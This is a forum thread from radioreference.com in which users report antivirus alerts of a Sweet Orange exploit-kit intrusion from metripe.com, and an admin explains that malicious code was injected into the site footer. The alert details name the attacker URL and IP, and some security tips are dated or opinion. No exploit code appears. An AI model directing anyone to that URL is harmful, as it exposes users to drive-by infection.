Possible Virus on Forums

[QDP2012]

Good evening Admins,

In case you would like to know...

When I visit the forums main page (forums.radioreference.com), and also when I then try to navigate to other sub-forums, and to individual threads, I am notified by Norton 360 of the following:

• Severity: High
• Message: An intrusion attempt by metripe.com was blocked.
• IPS Alert Name: Web Attack: Sweet Orange Exploit Kit Website
• Default Action: No Action Required
• Action Taken: No Action Required
• Attacking Computer: metripe.com (184.82.235.211, 80)
• Attacker URL: metripe.com/custom/back.php?humor=1
• Destination Address: (my computer's local private IP, port 1092)
• Source Address: 184.82.235.211

More info:

• OS: Win XP SP3 with current updates
• Browser: IE8
• Occurences: attack-blocked with every visit to any forum, any sub-forum, and any individual forum-page/thread.
• First event at: 2013-11-09 / 23:51:09 EST
• Most Recent at: (the time of this posting) (and each edit thereafter)
• This attack happens:
  • (1) when navigating between forums, and
  • (2) when I "previewed" this message before posting it, and
  • (3) regardless of whether I am logged-into the forums, or just browsing them anonymously.
• This attack does not happen when I visit other non-RR sites. It also does not happen when I visit the RRDB and the RR Wiki.

Hope this helps,

 

[Ed6698]

Avast antivirus is also picking up the exact same alert as posted above.

 

[Bubba1661]

Trojan

I'm getting it too. My McAfee intercepted it. Coming from www.metripe.com

 

[n5ims]

I'm also getting some popups that warn about an unsigned Java app from metripe.com that the forums are trying to run on my PC. Screenshots are attached to assist.

 

[TheManBornWithin]

Yeah same here, Chrome is warning me about metripe, and I get a brief toolbar warning that java was blocked.

 

[kc4jgc]

Wirelessly posted (BlackBerry8320/4.5.0.81 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/100)

Chrome is telling me that forums "contains malware" and is blocked for now. I hope my blackberry isn't suceptible to this.

 

[QDP2012]

Good job. Thanks!

Good job Admins. From here, it looks like the problem is resolved.

Thanks!

 

[blantonl]

Hackers injected the malicious code into the footer template - we've restored from a backup and are doing further triage and work.

Google should remove the malware alerts here shortly.

 

[amduscias]

Still getting this warning
Google Safe Browsing diagnostic page for forums.radioreference.com

 

[blantonl]

until Google implements a review and clears the alert that is going to happen. Nothing we can do on our end except wait for the big black box to resolve that issue,

 

[ind224]

Lindsay, do you approve of the tactics StopBadware / Google / whomever uses to block users from the site regardless of the issue? Isn't and hasn't malware and virus protection always been the end users responsibility in the event something exactly like this happens?
Hopefully the offender AND stopbadware get a dose of Federal scrutiny. Hacking including sending malicious code and DOS are illegal as far as I have been told.
I posted yesterday, had no issues and tried to see any updates on the thread this morning and was locked out. "Ignore the warning" sent me to the stopbad page with no remedy. Now, it allows me to come here as it should have all along, IMO.

Search google for metripe. The results are hilarious if this is such a big vulnerability.

 

[rananthony04]

In addition to the Java warning dialogue boxes, I also got a flash popup. The wording gave me a good chuckle.

 

[Ronaldski]

From what Lindsay said its on googles end looks like possibly? I also run Norton Endpoint protection but haven't seen any problems here at all.

Anything like that adobe popup its ALWAYS the best thing to go to Adobe - Install Adobe Flash Player and download it from there. Those popups that say to install something is the primary reason while searching the net is how to be infected.
Same goes for java. Go to java.com for the true program. One just doesnt know where it will take you after you hit the OK button as at that point you just gave them permission do what they wanted! Apparently the way you said rananthony04 it sounds like you are aware

Also be advised those antivirus programs are just your last chance to hopefully catch something. Your best antivirus is you!

i HIGHLY recommend using Download FileHippo Update Checker 1.040 - FileHippo.com at least weekly to update all the other software on your pc other than the Microsoft products since its the non Microsoft security holes is how they get through as well.

Leo Laportes recommendations -

1. Don’t open email attachments; even if it’s from someone you know. If you do get something from someone you know, make sure that they really sent it to you. Email attachments are the number one way viruses and trojan horses get into your email. You might also want to turn off HTML email in Outlook and other programs. HTML emails are just as dangerous as rogue web sites, and can spread infections just by previewing them.

2. Don’t click links in email. That link could lead you to a phishing site, or the link may lead you to install malicious software. Copy and paste links into your browser, or type them in by hand instead. Another reason to disable HTML email - the HTML hides the real destination of that seemingly innocuous link.

3. Don’t download files from places you aren’t absolutely sure are safe. Stick with the well known sites. Teeneagers who use filesharing software like BitTorrent, Azureus, Kazaa, Morpheus, Grokster, and Limewire, often unwittingly download spyware and trojans. If you must, quarantine all downloads then scan them a few days later with an updated anti-virus.

4. Update your OS regularly! Turn on automatic updates in OS X and Windows. Apply all critical updates immediately. Criminals often create hacks within 24 hours of Microsoft’s patches (these are called zero day exploits), so you need to protect yourself the day the patches appear.

5. Use a firewall. The best firewall is a hardware router - the kind you use to share an internet connection. Even if they’re not billed as firewalls, they are, and they’re quite effective. I also recommend turning on your operating system’s firewall - even if you have a router - but I don’t recommend third-party software firewalls. They cause more problems than they solve.

6. Never run as an administrator in any operating system. Administrators have way too many priveleges that malicious people/code can take advantage of. Run as a limited user as much as possible. Windows Vista, Linux, and Mac OSX allow you to run a majority of features, but with some additional safety, as a limited user

-- As far as tracking down hackers regrettably its all but useless. What they will do is use many infected personal computers, proxy sites to hack a site. That way it is very difficult to trace it back the originator. Most hacks come from Russia or China.

 

[SCPD]

Looks like it may be time to upgrade to 4.x or even 5. vBulletin is known for vulnerabilities on the 3.8.x versions.

 

[blantonl]

Looks like it may be time to upgrade to 4.x or even 5. vBulletin is known for vulnerabilities on the 3.8.x versions.

We are patched at level where there are no known vulnerabilities. The attack vector was most likely a different piece of software that we run some of our trouble ticketing activities with.

We have no plans on upgrading to 4.x or 5.x

 

[SCPD]

We are patched at level where there are no known vulnerabilities. The attack vector was most likely a different piece of software that we run some of our trouble ticketing activities with.

We have no plans on upgrading to 4.x or 5.x

Good to know. Thanks for your hard work!

 

[TheManBornWithin]

Thanks for the update Lindsay. I tried accessing the forum via Tapatalk, but I get a community not available (404) error. I don't know if you set it offline or if the repair kicked it offline.

 

[CapStar362]

still getting it, and my bit defender went off with metripe @ 1315 today

 

[deeridge]

I got the attack message this morning, cleared my cache and was able to view the forums for a while, but now the warning page appeared again. So I said I wanted to go there anyway. I'm new to the forums.

 

[Ed6698]

I am not getting the prompt from Avast anymore.